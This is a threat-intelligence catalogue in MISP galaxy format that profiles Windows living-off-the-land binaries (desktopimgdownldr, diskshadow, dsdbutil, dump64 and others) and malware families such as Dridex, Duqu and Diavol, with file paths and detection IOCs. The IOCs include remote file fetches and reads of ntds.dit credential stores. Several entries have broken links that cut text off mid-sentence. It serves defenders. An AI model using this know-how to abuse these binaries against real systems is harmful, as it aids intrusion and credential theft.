<sup>[[Desktopimgdownldr.exe - LOLBAS Project](/references/1df3aacf-76c4-472a-92c8-2a85ae9e2860)]</sup>

The tag is: misp-galaxy:software="Desktopimgdownldr.exe - Associated Software"

Desktopimgdownldr

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows binary used to configure lockscreen/desktop image

Author: Gal Kristal

Paths: * c:\windows\system32\desktopimgdownldr.exe

Detection: * Sigma: [proc_creation_win_desktopimgdownldr_susp_execution.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml) * Sigma: [file_event_win_susp_desktopimgdownldr_file.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml) * Elastic: [command_and_control_remote_file_copy_desktopimgdownldr.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml) * IOC: desktopimgdownldr.exe that creates non-image file * IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl<sup>[[Desktopimgdownldr.exe - LOLBAS Project](/references/1df3aacf-76c4-472a-92c8-2a85ae9e2860)]</sup>

The tag is: misp-galaxy:software="Desktopimgdownldr"

DeviceCredentialDeployment.exe - Associated Software

<sup>[[DeviceCredentialDeployment.exe - LOLBAS Project](/references/fef281e8-8138-4420-b11b-66d1e6a19805)]</sup>

The tag is: misp-galaxy:software="DeviceCredentialDeployment.exe - Associated Software"

DeviceCredentialDeployment

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Device Credential Deployment

Author: Elliot Killick

Paths: * C:\Windows\System32\DeviceCredentialDeployment.exe

Resources: None Provided

Detection: * IOC: DeviceCredentialDeployment.exe should not be run on a normal workstation * Sigma: [proc_creation_win_lolbin_device_credential_deployment.yml]([DeviceCredentialDeployment.exe - LOLBAS Project(/references/fef281e8-8138-4420-b11b-66d1e6a19805)]</sup>

The tag is: misp-galaxy:software="DeviceCredentialDeployment"

Devinit.exe - Associated Software

<sup>[[Devinit.exe - LOLBAS Project](/references/27343583-c17d-4c11-a7e3-14d725756556)]</sup>

The tag is: misp-galaxy:software="Devinit.exe - Associated Software"

Devinit

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Visual Studio 2019 tool

Author: mr.d0x

Paths: * C:\Program Files\Microsoft Visual Studio*\Community\Common7\Tools\devinit\devinit.exe * C:\Program Files (x86)\Microsoft Visual Studio\*\Community\Common7\Tools\devinit\devinit.exe

Detection: * Sigma: [proc_creation_win_devinit_lolbin_usage.yml]([Devinit.exe - LOLBAS Project(/references/27343583-c17d-4c11-a7e3-14d725756556)]</sup>

The tag is: misp-galaxy:software="Devinit"

Devtoolslauncher.exe - Associated Software

<sup>[[Devtoolslauncher.exe - LOLBAS Project](/references/cb263978-019c-40c6-b6de-61db0e7a8941)]</sup>

The tag is: misp-galaxy:software="Devtoolslauncher.exe - Associated Software"

Devtoolslauncher

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary will execute specified binary. Part of VS/VScode installation.

Author: felamos

Paths: * c:\windows\system32\devtoolslauncher.exe

Detection: * Sigma: [proc_creation_win_lolbin_devtoolslauncher.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml) * IOC: DeveloperToolsSvc.exe spawned an unknown process<sup>[[Devtoolslauncher.exe - LOLBAS Project](/references/cb263978-019c-40c6-b6de-61db0e7a8941)]</sup>

The tag is: misp-galaxy:software="Devtoolslauncher"

devtunnel.exe - Associated Software

<sup>[[devtunnel.exe - LOLBAS Project](/references/657c8b4c-1eee-4997-8461-c7592eaed9e8)]</sup>

The tag is: misp-galaxy:software="devtunnel.exe - Associated Software"

devtunnel

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary to enable forwarded ports on windows operating systems.

Author: Kamran Saifullah

Paths: * C:\Users\<username>\AppData\Local\Temp\.net\devtunnel\ * C:\Users\<username>\AppData\Local\Temp\DevTunnels

Detection: * IOC: devtunnel.exe binary spawned * IOC: .devtunnels.ms * IOC: *..devtunnels.ms * Analysis: [https://cydefops.com/vscode-data-exfiltration]([devtunnel.exe - LOLBAS Project(/references/657c8b4c-1eee-4997-8461-c7592eaed9e8)]</sup>

The tag is: misp-galaxy:software="devtunnel"

DEWMODE

According to joint Cybersecurity Advisory AA23-158A (June 2023), DEWMODE is a web shell written in PHP that is designed to interact with a MySQL database. During a campaign from 2020 to 2021, threat actors exploited multiple zero-day vulnerabilities in internet-facing Accellion File Transfer Appliance (FTA) devices, installing DEWMODE web shells to exfiltrate data from compromised networks.<sup>[[Mandiant MOVEit Transfer June 2 2023](/references/232c7555-0483-4a57-88cb-71a990f7d683)]</sup>

Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/dewmode/

The tag is: misp-galaxy:software="DEWMODE"

Dfshim.dll - Associated Software

<sup>[[Dfshim.dll - LOLBAS Project](/references/30503e42-6047-46a9-8189-e6caa5f4deb0)]</sup>

The tag is: misp-galaxy:software="Dfshim.dll - Associated Software"

Dfshim

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: ClickOnce engine in Windows used by .NET

Author: Oddvar Moe

Paths: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe

Detection: * Sigma: [proc_creation_win_rundll32_susp_activity.yml]([Dfshim.dll - LOLBAS Project(/references/30503e42-6047-46a9-8189-e6caa5f4deb0)]</sup>

The tag is: misp-galaxy:software="Dfshim"

Dfsvc.exe - Associated Software

<sup>[[Dfsvc.exe - LOLBAS Project](/references/7f3a78c0-68b2-4a9d-ae6a-6e63e8ddac3f)]</sup>

The tag is: misp-galaxy:software="Dfsvc.exe - Associated Software"

Dfsvc

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: ClickOnce engine in Windows used by .NET

Author: Oddvar Moe

Paths: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe

Detection: * Sigma: [proc_creation_win_rundll32_susp_activity.yml]([Dfsvc.exe - LOLBAS Project(/references/7f3a78c0-68b2-4a9d-ae6a-6e63e8ddac3f)]</sup>

The tag is: misp-galaxy:software="Dfsvc"

Diantz.exe - Associated Software

<sup>[[diantz.exe_lolbas](/references/66652db8-5594-414f-8a6b-83d708a0c1fa)]</sup>

The tag is: misp-galaxy:software="Diantz.exe - Associated Software"

Diantz

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary that package existing files into a cabinet (.cab) file

Author: Tamir Yehuda

Paths: * c:\windows\system32\diantz.exe * c:\windows\syswow64\diantz.exe

Detection: * Sigma: [proc_creation_win_lolbin_diantz_ads.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml) * Sigma: [proc_creation_win_lolbin_diantz_remote_cab.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml) * IOC: diantz storing data into alternate data streams. * IOC: diantz getting a file from a remote machine or the internet.<sup>[[diantz.exe_lolbas](/references/66652db8-5594-414f-8a6b-83d708a0c1fa)]</sup>

The tag is: misp-galaxy:software="Diantz"

Diavol

[Diavol](https://app.tidalcyber.com/software/d057b6e7-1de4-4f2f-b374-7e879caecd67) is a ransomware variant first observed in June 2021 that is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker. [Diavol](https://app.tidalcyber.com/software/d057b6e7-1de4-4f2f-b374-7e879caecd67) has been deployed by [Bazar](https://app.tidalcyber.com/software/b35d9817-6ead-4dbd-a2fa-4b8e217f8eac) and is thought to have potential ties to [Wizard Spider]([Fortinet Diavol July 2021(https://app.tidalcyber.com/references/28c650f2-8ce8-4c78-ab4a-cae56c1548ed)]</sup><sup>[[FBI Flash Diavol January 2022](https://app.tidalcyber.com/references/a1691741-9ecd-4b20-8cc9-b9bdfc1592b5)]</sup><sup>[[DFIR Diavol Ransomware December 2021](https://app.tidalcyber.com/references/eb89f18d-684c-4220-b2a8-967f1f8f9162)]</sup>

The tag is: misp-galaxy:software="Diavol"

Dipsind

[Dipsind](https://app.tidalcyber.com/software/226ee563-4d49-48c2-aa91-82999f43ce30) is a malware family of backdoors that appear to be used exclusively by [PLATINUM](https://app.tidalcyber.com/groups/f036b992-4c3f-47b7-a458-94ac133bce74). <sup>[[Microsoft PLATINUM April 2016](https://app.tidalcyber.com/references/d0ec5037-aa7f-48ee-8d37-ff8fb2c8c297)]</sup>

The tag is: misp-galaxy:software="Dipsind"

Disco

[Disco](https://app.tidalcyber.com/software/194314e3-4edc-5346-96b6-d2d7bf5d830a) is a custom implant that has been used by [MoustachedBouncer](https://app.tidalcyber.com/groups/f31df12e-66ea-5a49-87bc-2bc1756a89fc) since at least 2020 including in campaigns using targeted malicious content injection for initial access and command and control.<sup>[[MoustachedBouncer ESET August 2023](https://app.tidalcyber.com/references/9070f14b-5d5e-5f6d-bcac-628478e01242)]</sup>

The tag is: misp-galaxy:software="Disco"

Diskshadow.exe - Associated Software

<sup>[[Diskshadow.exe - LOLBAS Project](/references/27a3f0b4-e699-4319-8b52-8eae4581faa2)]</sup>

The tag is: misp-galaxy:software="Diskshadow.exe - Associated Software"

Diskshadow

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).

Author: Oddvar Moe

Paths: * C:\Windows\System32\diskshadow.exe * C:\Windows\SysWOW64\diskshadow.exe

Detection: * Sigma: [proc_creation_win_lolbin_diskshadow.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diskshadow.yml) * Sigma: [proc_creation_win_susp_shadow_copies_deletion.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml) * Elastic: [credential_access_cmdline_dump_tool.toml](https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml) * IOC: Child process from diskshadow.exe<sup>[[Diskshadow.exe - LOLBAS Project](/references/27a3f0b4-e699-4319-8b52-8eae4581faa2)]</sup>

The tag is: misp-galaxy:software="Diskshadow"

Dnscmd.exe - Associated Software

<sup>[[Dnscmd.exe - LOLBAS Project](/references/3571ca9d-3388-4e74-8b30-dd92ef2b5f10)]</sup>

The tag is: misp-galaxy:software="Dnscmd.exe - Associated Software"

Dnscmd

Dnscmd is a Windows command-line utility used to manage DNS servers.<sup>[[Dnscmd Microsoft](/references/24b1cb7b-357f-470f-9715-fa0ec3958cbb)]</sup>

The tag is: misp-galaxy:software="Dnscmd"

DnsSystem

[DnsSystem](https://app.tidalcyber.com/software/e69a913d-4ddc-4d69-9961-25a31cae5899) is a .NET based DNS backdoor, which is a customized version of the open source tool DIG.net, that has been used by [HEXANE](https://app.tidalcyber.com/groups/eecf7289-294f-48dd-a747-7705820f4735) since at least June 2022.<sup>[[Zscaler Lyceum DnsSystem June 2022](https://app.tidalcyber.com/references/eb78de14-8044-4466-8954-9ca44a17e895)]</sup>

The tag is: misp-galaxy:software="DnsSystem"

dnx.exe - Associated Software

<sup>[[dnx.exe - LOLBAS Project](/references/50652a27-c47b-41d4-a2eb-2ebf74e5bd09)]</sup>

The tag is: misp-galaxy:software="dnx.exe - Associated Software"

dnx

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: .Net Execution environment file included with .Net.

Author: Oddvar Moe

Paths: * N/A

The tag is: misp-galaxy:software="dnx"

DOGCALL

[DOGCALL](https://app.tidalcyber.com/software/81ce23c0-f505-4d75-9928-4fbd627d3bc2) is a backdoor used by [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) that has been used to target South Korean government and military organizations in 2017. It is typically dropped using a Hangul Word Processor (HWP) exploit. <sup>[[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)]</sup>

The tag is: misp-galaxy:software="DOGCALL"

Retefe - Associated Software

The tag is: misp-galaxy:software="Retefe - Associated Software"

Dok

[Dok](https://app.tidalcyber.com/software/dfa14314-3c64-4a10-9889-0423b884f7aa) is a Trojan application disguised as a .zip file that is able to collect user credentials and install a malicious proxy server to redirect a user’s network traffic (i.e. [Adversary-in-the-Middle]([objsee mac malware 2017(https://app.tidalcyber.com/references/08227ae5-4086-4c31-83d9-459c3a097754)]</sup><sup>[[hexed osx.dok analysis 2019](https://app.tidalcyber.com/references/96f9d36a-01a5-418e-85f4-957e58d49c1b)]</sup><sup>[[CheckPoint Dok](https://app.tidalcyber.com/references/8c178fd8-db34-45c6-901a-a8b2c178d809)]</sup>

The tag is: misp-galaxy:software="Dok"

Doki

[Doki](https://app.tidalcyber.com/software/e6160c55-1868-47bd-bec6-7becbf236bbb) is a backdoor that uses a unique Dogecoin-based Domain Generation Algorithm and was first observed in July 2020. [Doki](https://app.tidalcyber.com/software/e6160c55-1868-47bd-bec6-7becbf236bbb) was used in conjunction with the [ngrok](https://app.tidalcyber.com/software/316ecd9d-ac0b-58c7-8083-5d9214c770f6) Mining Botnet in a campaign that targeted Docker servers in cloud platforms. <sup>[[Intezer Doki July 20](https://app.tidalcyber.com/references/688b2582-6602-44e1-aaac-3a4b8e168b04)]</sup>

The tag is: misp-galaxy:software="Doki"

Donut

[Donut](https://app.tidalcyber.com/software/40d25a38-91f4-4e07-bb97-8866bed8e44f) is an open source framework used to generate position-independent shellcode.<sup>[[Donut Github](https://app.tidalcyber.com/references/5f28c41f-6903-4779-93d4-3de99e031b70)]</sup><sup>[[Introducing Donut](https://app.tidalcyber.com/references/8fd099c6-e002-44d0-8b7f-65f290a42c07)]</sup> [Donut](https://app.tidalcyber.com/software/40d25a38-91f4-4e07-bb97-8866bed8e44f) generated code has been used by multiple threat actors to inject and load malicious payloads into memory.<sup>[[NCC Group WastedLocker June 2020](https://app.tidalcyber.com/references/1520f2e5-2689-428f-9ee4-05e153a52381)]</sup>

The tag is: misp-galaxy:software="Donut"

Dotnet.exe - Associated Software

<sup>[[Dotnet.exe - LOLBAS Project](/references/8abe21ad-88d1-4a5c-b79e-8216b4b06862)]</sup>

The tag is: misp-galaxy:software="Dotnet.exe - Associated Software"

Dotnet

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: dotnet.exe comes with .NET Framework

Author: felamos

Paths: * C:\Program Files\dotnet\dotnet.exe

The tag is: misp-galaxy:software="Dotnet"

Delphacy - Associated Software

The tag is: misp-galaxy:software="Delphacy - Associated Software"

Downdelph

[Downdelph](https://app.tidalcyber.com/software/f7b64b81-f9e7-46bf-8f63-6d7520da832c) is a first-stage downloader written in Delphi that has been used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) in rare instances between 2013 and 2015. <sup>[[ESET Sednit Part 3](https://app.tidalcyber.com/references/7c2be444-a947-49bc-b5f6-8f6bec870c6a)]</sup>

The tag is: misp-galaxy:software="Downdelph"

down_new

[down_new](https://app.tidalcyber.com/software/20b796cf-6c90-4928-999e-88107078e15e) is a downloader that has been used by [BRONZE BUTLER](https://app.tidalcyber.com/groups/5825a840-5577-4ffc-a08d-3f48d64395cb) since at least 2019.<sup>[[Trend Micro Tick November 2019](https://app.tidalcyber.com/references/93adbf0d-5f5e-498e-aca1-ed3eb11561e7)]</sup>

The tag is: misp-galaxy:software="down_new"

DownPaper

[DownPaper](https://app.tidalcyber.com/software/fc433c9d-a7fe-4915-8aa0-06b58f288249) is a backdoor Trojan; its main functionality is to download and run second stage malware. <sup>[[ClearSky Charming Kitten Dec 2017](https://app.tidalcyber.com/references/23ab1ad2-e9d4-416a-926f-6220a59044ab)]</sup>

The tag is: misp-galaxy:software="DownPaper"

DRATzarus

[DRATzarus](https://app.tidalcyber.com/software/c6c79fc5-e4b1-4f6c-a71d-d22d699d5caf) is a remote access tool (RAT) that has been used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) to target the defense and aerospace organizations globally since at least summer 2020. [DRATzarus](https://app.tidalcyber.com/software/c6c79fc5-e4b1-4f6c-a71d-d22d699d5caf) shares similarities with [Bankshot](https://app.tidalcyber.com/software/24b8471d-698f-48cc-b47a-8fbbaf28b293), which was used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) in 2017 to target the Turkish financial sector.<sup>[[ClearSky Lazarus Aug 2020](https://app.tidalcyber.com/references/2827e6e4-8163-47fb-9e22-b59e59cd338f)]</sup>

The tag is: misp-galaxy:software="DRATzarus"

Bugat v5 - Associated Software

The tag is: misp-galaxy:software="Bugat v5 - Associated Software"

Dridex

[Dridex](https://app.tidalcyber.com/software/e3cd4405-b698-41d9-88e4-fff29e7a19e2) is a prolific banking Trojan that first appeared in 2014. By December 2019, the US Treasury estimated [Dridex](https://app.tidalcyber.com/software/e3cd4405-b698-41d9-88e4-fff29e7a19e2) had infected computers in hundreds of banks and financial institutions in over 40 countries, leading to more than $100 million in theft. [Dridex](https://app.tidalcyber.com/software/e3cd4405-b698-41d9-88e4-fff29e7a19e2) was created from the source code of the Bugat banking Trojan (also known as Cridex).<sup>[[Dell Dridex Oct 2015](https://app.tidalcyber.com/references/f81ce947-d875-4631-9709-b54c8b5d25bc)]</sup><sup>[[Kaspersky Dridex May 2017](https://app.tidalcyber.com/references/52c48bc3-2b53-4214-85c3-7e5dd036c969)]</sup><sup>[[Treasury EvilCorp Dec 2019](https://app.tidalcyber.com/references/074a52c4-26d9-4083-9349-c14e2639c1bc)]</sup>

The tag is: misp-galaxy:software="Dridex"

DropBook

[DropBook](https://app.tidalcyber.com/software/9c44d3f9-7a7b-4716-9cfa-640b36548ab0) is a Python-based backdoor compiled with PyInstaller.<sup>[[Cybereason Molerats Dec 2020](https://app.tidalcyber.com/references/81a10a4b-c66f-4526-882c-184436807e1d)]</sup>

The tag is: misp-galaxy:software="DropBook"

Drovorub

[Drovorub](https://app.tidalcyber.com/software/bb7f7c19-ffb5-4bfe-99b1-ead3525c5e7b) is a Linux malware toolset comprised of an agent, client, server, and kernel modules, that has been used by [APT28]([NSA/FBI Drovorub August 2020(https://app.tidalcyber.com/references/d697a342-4100-4e6b-95b9-4ae3ba80924b)]</sup>

The tag is: misp-galaxy:software="Drovorub"

dsdbutil.exe - Associated Software

<sup>[[dsdbutil.exe - LOLBAS Project](/references/fc982faf-a37d-4d0b-949c-f7a27adc3030)]</sup>

The tag is: misp-galaxy:software="dsdbutil.exe - Associated Software"

dsdbutil

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Dsdbutil is a command-line tool that is built into Windows Server. It is available if you have the AD LDS server role installed. Can be used as a command line utility to export Active Directory.

Author: Ekitji

Paths: * C:\Windows\System32\dsdbutil.exe * C:\Windows\SysWOW64\dsdbutil.exe

Detection: * IOC: Event ID 4688 * IOC: dsdbutil.exe process creation * IOC: Event ID 4663 * IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit * IOC: Event ID 4656 * IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit * Analysis: None Provided * Sigma: None Provided * Elastic: None Provided * Splunk: None Provided * BlockRule: None Provided<sup>[[dsdbutil.exe - LOLBAS Project](/references/fc982faf-a37d-4d0b-949c-f7a27adc3030)]</sup>

The tag is: misp-galaxy:software="dsdbutil"

dsquery.exe - Associated Software

The tag is: misp-galaxy:software="dsquery.exe - Associated Software"

dsquery

[dsquery](https://app.tidalcyber.com/software/06402bdc-a4a1-4e4a-bfc4-09f2c159af75) is a command-line utility that can be used to query Active Directory for information from a system within a domain. <sup>[[TechNet Dsquery](https://app.tidalcyber.com/references/bbbb4a45-2963-4f04-901a-fb2752800e12)]</sup> It is typically installed only on Windows Server versions but can be installed on non-server variants through the Microsoft-provided Remote Server Administration Tools bundle.

The tag is: misp-galaxy:software="dsquery"

Dtrack

[Dtrack](https://app.tidalcyber.com/software/aa21462d-9653-48eb-a82e-5c93c9db5f7a) is spyware that was discovered in 2019 and has been used against Indian financial institutions, research facilities, and the Kudankulam Nuclear Power Plant. [Dtrack](https://app.tidalcyber.com/software/aa21462d-9653-48eb-a82e-5c93c9db5f7a) shares similarities with the DarkSeoul campaign, which was attributed to [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08). <sup>[[Kaspersky Dtrack](https://app.tidalcyber.com/references/0122ee35-938d-493f-a3bb-bc75fc808f62)]</sup><sup>[[Securelist Dtrack](https://app.tidalcyber.com/references/49bd8841-a4b5-4ced-adfa-0ad0c8625ccd)]</sup><sup>[[Dragos WASSONITE](https://app.tidalcyber.com/references/39e6ab06-9f9f-4292-9034-b2f56064164d)]</sup><sup>[[CyberBit Dtrack](https://app.tidalcyber.com/references/1ac944f4-868c-4312-8b5d-1580fd6542a0)]</sup><sup>[[ZDNet Dtrack](https://app.tidalcyber.com/references/6e6e02da-b805-47d7-b410-343a1b5da042)]</sup>

The tag is: misp-galaxy:software="Dtrack"

Dump64.exe - Associated Software

<sup>[[Dump64.exe - LOLBAS Project](/references/b0186447-a6d5-40d7-a11d-ab2e9fb93087)]</sup>

The tag is: misp-galaxy:software="Dump64.exe - Associated Software"

Dump64

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Memory dump tool that comes with Microsoft Visual Studio

Author: mr.d0x

Paths: * C:\Program Files (x86)\Microsoft Visual Studio\Installer\Feedback\dump64.exe

Detection: * Sigma: [proc_creation_win_lolbin_dump64.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dump64.yml) * IOC: As a Windows SDK binary, execution on a system may be suspicious<sup>[[Dump64.exe - LOLBAS Project](/references/b0186447-a6d5-40d7-a11d-ab2e9fb93087)]</sup>

The tag is: misp-galaxy:software="Dump64"

DumpMinitool.exe - Associated Software

<sup>[[DumpMinitool.exe - LOLBAS Project](/references/4634e025-c005-46fe-b97c-5d7dda455ba0)]</sup>

The tag is: misp-galaxy:software="DumpMinitool.exe - Associated Software"

DumpMinitool

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Dump tool part Visual Studio 2022

Author: mr.d0x

Paths: * C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions

Detection: * Sigma: [proc_creation_win_dumpminitool_execution.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_dumpminitool_execution.yml) * Sigma: [proc_creation_win_dumpminitool_susp_execution.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_dumpminitool_susp_execution.yml) * Sigma: [proc_creation_win_devinit_lolbin_usage.yml]([DumpMinitool.exe - LOLBAS Project(/references/4634e025-c005-46fe-b97c-5d7dda455ba0)]</sup>

The tag is: misp-galaxy:software="DumpMinitool"

Duqu

[Duqu](https://app.tidalcyber.com/software/d4a664e5-9819-4f33-8b2b-e6f8e6a64999) is a malware platform that uses a modular approach to extend functionality after deployment within a target network. <sup>[[Symantec W32.Duqu](https://app.tidalcyber.com/references/8660411a-6b9c-46c2-8f5f-049ec60c7d40)]</sup>

The tag is: misp-galaxy:software="Duqu"

NeD Worm - Associated Software

The tag is: misp-galaxy:software="NeD Worm - Associated Software"

DustySky

The tag is: misp-galaxy:software="DustySky"

Dxcap.exe - Associated Software

<sup>[[Dxcap.exe - LOLBAS Project](/references/7611eb7a-46b7-4c76-9728-67c1fbf20e17)]</sup>

The tag is: misp-galaxy:software="Dxcap.exe - Associated Software"

Dxcap

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: DirectX diagnostics/debugger included with Visual Studio.

Author: Oddvar Moe

Paths: * C:\Windows\System32\dxcap.exe * C:\Windows\SysWOW64\dxcap.exe

Detection: * Sigma: [proc_creation_win_lolbin_susp_dxcap.yml]([Dxcap.exe - LOLBAS Project(/references/7611eb7a-46b7-4c76-9728-67c1fbf20e17)]</sup>

The tag is: misp-galaxy:software="Dxcap"

Dyzap - Associated Software

The tag is: misp-galaxy:software="Dyzap - Associated Software"

Dyreza - Associated Software

The tag is: misp-galaxy:software="Dyreza - Associated Software"

Dyre

[Dyre](https://app.tidalcyber.com/software/38e012f7-fb3a-4250-a129-92da3a488724) is a banking Trojan that has been used for financial gain. <sup>[[Symantec Dyre June 2015](https://app.tidalcyber.com/references/a9780bb0-302f-44c2-8252-b53d94da24e6)]</sup><sup>[[Malwarebytes Dyreza November 2015](https://app.tidalcyber.com/references/0a5719f2-8a88-44e2-81c5-2d16a39f1f8d)]</sup>

The tag is: misp-galaxy:software="Dyre"

Earthworm

Earthworm is an open-source tool. According to its project website, Earthworm is a "simple network tunnel with SOCKS v5 server and port transfer".<sup>[[Elastic Docs Potential Protocol Tunneling via EarthWorm](/references/a02790a1-f7c5-43b6-bc7e-075b2c0aa791)]</sup> According to joint Cybersecurity Advisory AA23-144a (May 2023), Volt Typhoon actors have used Earthworm in their attacks.<sup>[[U.S. CISA Volt Typhoon May 24 2023](/references/12320f38-ebbf-486a-a450-8a548c3722d6)]</sup>

The tag is: misp-galaxy:software="Earthworm"

Ebury

